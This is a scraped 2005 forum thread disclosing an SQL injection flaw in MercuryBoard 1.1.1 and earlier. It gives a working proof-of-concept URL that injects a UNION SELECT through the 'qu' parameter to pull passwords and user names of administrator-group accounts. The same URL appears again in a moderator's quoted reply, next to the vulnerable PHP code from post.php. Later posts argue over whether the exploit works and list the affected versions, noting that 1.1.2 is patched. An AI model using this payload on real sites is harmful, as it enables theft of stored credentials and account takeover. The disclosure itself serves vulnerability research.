 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 89
 Members: 0
 Total: 89
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Critical Sql injection in Mercuryboard <= 1.1.1 |
|
 Posted: Tue Feb 08, 2005 10:22 am |
 |
|
| Zeelock |
| Active user |
 |
|
| Joined: Jan 27, 2005 |
| Posts: 29 |
| Location: Where stars come out at night |
|
|
 |
|
 |
|
I saw that the released exploits didn't work.
This proof of concept do the job:
http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION%20SELECT%20user_password,user_name%20from%20mb_users%20where%20user_group%20=%201%20limit%201/*
The problem of previous exploit on the 't' variable was that the single value was used in multiple queries.
The one i found is on this piece of code in post.php:
--------[ Mercury 1.1.1 original code ]--------------
if (($s == 'reply') && isset($this->get['qu'])) {
$query = $this->db->fetch("SELECT p.post_text, m.user_name FROM {
$this->pre}posts p, {$this->pre}users m WHERE p.post_id={
$this->get['qu']} AND p.post_author=m.user_id");
--------[/Mercury 1.1.1 original code ]--------------
the nice thing is that injecting the q value permits to see data directly on the form metween quotes.
Notes:
Version 1.1.2 is already patched against this.
Zeelock |
|
_________________
If it seems to be impossible, just step up your level! |
|
|
|
|
|
Re: Critical Sql injection in Mercuryboard <= 1.1.1 |
|
| Posted: Wed Feb 09, 2005 8:08 am |
|
|
| LINUX |
| Moderator |
 |
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
|
|
|
|
| Zeelock wrote: | I saw that the released exploits didn't work.
This proof of concept do the job:
http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION%20SELECT%20user_password,user_name%20from%20mb_users%20where%20user_group%20=%201%20limit%201/*
The problem of previous exploit on the 't' variable was that the single value was used in multiple queries.
The one i found is on this piece of code in post.php:
--------[ Mercury 1.1.1 original code ]--------------
if (($s == 'reply') && isset($this->get['qu'])) {
$query = $this->db->fetch("SELECT p.post_text, m.user_name FROM {
$this->pre}posts p, {$this->pre}users m WHERE p.post_id={
$this->get['qu']} AND p.post_author=m.user_id");
--------[/Mercury 1.1.1 original code ]--------------
the nice thing is that injecting the q value permits to see data directly on the form metween quotes.
Notes:
Version 1.1.2 is already patched against this.
Zeelock |
yes men, i test all versions not work in all, this exploit is fake or not complete exploit |
|
|
|
|
|
|
wtf!!! |
|
| Posted: Wed Feb 09, 2005 8:32 am |
|
|
| Zeelock |
| Active user |
|
|
| Joined: Jan 27, 2005 |
| Posts: 29 |
| Location: Where stars come out at night |
|
|
|
|
|
|
|
_________________
If it seems to be impossible, just step up your level! |
|
|
|
| Posted: Fri Feb 11, 2005 5:27 am |
|
|
| LINUX |
| Moderator |
|
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
|
|
|
|
yes men very good work zeelock  |
|
|
|
|
|
Re: Critical Sql injection in Mercuryboard <= 1.1.1 |
|
| Posted: Tue Feb 15, 2005 5:52 am |
|
|
| Lostmon |
| Regular user |
|
|
| Joined: Jul 24, 2004 |
| Posts: 6 |
| Location: spain |
|
|
|
|
|
|
hello !!
i?m currenly documenting this vuln and make probes in
mercuryboard 1.0.x and 1.1.x
any of this xploits working
but is shure what can inject sql commands...
have any more proof of concept ??
Thnx |
|
_________________
--
La curiosidad es lo que hace mover la mente |
|
|
|
|
Critical Sql injection in Mercuryboard <= 1.1.1 |
|
| Posted: Tue Feb 15, 2005 12:50 pm |
|
|
| Lostmon |
| Regular user |
|
|
| Joined: Jul 24, 2004 |
| Posts: 6 |
| Location: spain |
|
|
|
|
|
|
Oks
After making some several probes whith some versions
this is the result
Mercuryboard 1.1.2 Not Affected
Mercuryboard 1.1.0 Affected
Mercuryboard 1.0.1 Affected
Mercuryboard 1.0.2 Affected
thnx !!!!! |
|
_________________
--
La curiosidad es lo que hace mover la mente |
|
|
|
|
For more info: |
|
| Posted: Wed Feb 16, 2005 8:34 am |
|
|
| Zeelock |
| Active user |
|
|
| Joined: Jan 27, 2005 |
| Posts: 29 |
| Location: Where stars come out at night |
|
|
|
|
|
|
|
_________________
If it seems to be impossible, just step up your level! |
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
